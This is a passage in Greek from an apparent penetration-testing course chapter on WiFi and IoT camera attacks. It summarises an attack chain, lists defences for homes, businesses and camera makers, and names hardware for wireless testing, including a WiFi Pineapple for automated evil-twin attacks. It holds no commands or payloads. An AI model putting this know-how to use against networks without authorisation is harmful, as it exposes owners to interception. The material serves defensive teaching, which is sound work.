Η αναφορά προς τον πελάτη αναφέρει την πλήρη αλυσίδα: αδύναμη passphrase WiFi → σύνδεση → προεπιλεγμένο login → βίντεο υποκλαπηκε. Μία μόνο αδυναμία που θα είχε κοπεί δεν θα αρκούσε: είναι ο συνδυασμός που μετράει.
Συγκεκριμένες άμυνες
Για έναν ιδιώτη
- Passphrase WiFi 20 χαρακτήρων ή περισσότερων, τυχαία. Δημιουργημένη με έναν διαχειριστή κωδικών (Bitwarden, 1Password). Ρυθμός εναλλαγής: ποτέ, εκτός αν υπάρχει γνωστή παραβίαση.
- Καθαρό WPA3 αν όλες οι συσκευές το υποστηρίζουν. WPA2/WPA3 μικτό αλλιώς, απενεργοποιώντας το WPS.
- Δίκτυο επισκεπτών ενεργοποιημένο στο box, για όλους τους επισκέπτες.
- Ξεχωριστό δίκτυο IoT: τα περισσότερα πρόσφατα boxes προσφέρουν ένα αφιερωμένο SSID «SmartHome», απομονωμένο από το κύριο δίκτυο.
- Άμεση αλλαγή των προεπιλεγμένων credentials κάθε συνδεδεμένης συσκευής, συμπεριλαμβανομένων καμερών, θερμοστατών, λαμπτήρων, φωνητικών βοηθών.
- Απενεργοποίηση του UPnP στο box. Μια θύρα πρέπει να ανοίγει χειροκίνητα, ποτέ αυτόματα.
- Ενημερωμένο firmware του box και των καμερών. Αν ο κατασκευαστής δεν προσφέρει πλέον ενημέρωση, πετάξτε τη συσκευή.
Για μια επιχείρηση
- WPA2-Enterprise / WPA3-Enterprise (802.1X), ένας λογαριασμός ανά χρήστη, ένα πιστοποιητικό ανά συσκευή. Τέλος στους κοινούς κωδικούς.
- Ξεχωριστά VLAN για κάμερες, εκτυπωτές, IoT, επισκέπτες, υπαλλήλους.
- WIDS/WIPS (Wireless Intrusion Detection / Prevention) που εντοπίζει τα rogue APs, τα μαζικά deauth, τα evil twins. Λύσεις: Aruba ClearPass, Cisco Meraki, Fortinet WiFi.
- PMF υποχρεωτικό παντού όπου είναι δυνατό. Απόρριψη πελατών που δεν το υποστηρίζουν ή περιορισμός τους σε ένα SSID επισκεπτών με όρια.
- Ανανέωση υλικού κάθε 5 έως 7 χρόνια: οι παλιοί AP δεν έχουν τις διορθώσεις KRACK ούτε την υποστήριξη WPA3.
Για έναν κατασκευαστή καμερών
- Εναλλαγή credentials ανά μοναδική συσκευή ήδη από την έξοδο από το εργοστάσιο, όχι έναν κωδικό ανά παρτίδα.
- Αυτόματη υπογεγραμμένη ενημέρωση ενεργοποιημένη από προεπιλογή, μη απενεργοποιήσιμη.
- Υποχρεωτικό HTTPS στη διεπαφή admin, ανακατεύθυνση από HTTP.
- Υποχρεωτική αυθεντικοποίηση στο RTSP και στο ONVIF, χωρίς επιλογή για απενεργοποίησή της.
- Ρητή άρνηση του UPnP — ποτέ αυτοανακοίνωση στο WAN χωρίς ρητή χειροκίνητη ρύθμιση από τον ιδιοκτήτη.
Όρια του Docker lab και φυσικά fallbacks
Αυτό το κεφάλαιο δεν συνοδεύεται από εκτελέσιμο Docker lab, για έναν απλό λόγο: η πραγματική ραδιοσυχνότητα δεν εικονικοποιείται. Το Docker δίνει πρόσβαση σε ένα σύστημα Linux, όχι σε ένα φυσικό στοίβα 802.11. Οι τεχνικές εδώ απαιτούν:
- Μια κάρτα WiFi USB συμβατή με monitor mode και injection.
- Δύο φυσικές συσκευές σε κοντινή απόσταση (τον επιτιθέμενο και ένα θύμα).
- Ένα περιβάλλον RF όπου επιτρέπεται να εκπέμπετε — δηλαδή το δικό σας δίκτυο ή αυτό ενός πελάτη με υπογεγραμμένη σύμβαση pentest.
Για να εξασκηθείτε χωρίς πλήρες φυσικό εργαστήριο:
- Το Wifi CTF Academy προσφέρει CTF WiFi με προ-καταγεγραμμένες
συλλήψεις προς σπάσιμο offline (ιδανικό για hashcat, παρεχόμενο
.pcapng). - Τα VulnHub / OffSec Proving Grounds προσφέρουν VM με ενσωματωμένες συλλήψεις προς ανάλυση.
- Τα Ludus ή GOAD (Game of Active Directory) προτείνουν ευρύτερα labs όπου το WiFi προσομοιώνεται.
Για ένα πραγματικό pentest πελάτη, ο ελάχιστος εξοπλισμός το 2026:
- Μια κάρτα Alfa AWUS036ACHM (30 €).
- Μια κεραία omni +9 dBi + μια yagi +15 dBi.
- Ένα WiFi Pineapple (προαιρετικό, 200 €, για το αυτοματοποιημένο evil twin).
- Ένα USB GPS (προαιρετικό, για χαρτογράφηση των AP κατά τη διάρκεια μιας φυσικής επίσκεψης του χώρου).
Συνολικό κόστος υλικού: μεταξύ 30 και 500 € ανάλογα με τη φιλοδοξία. Είναι η πιο αποδοτική επένδυση για έναν pentester το 2026.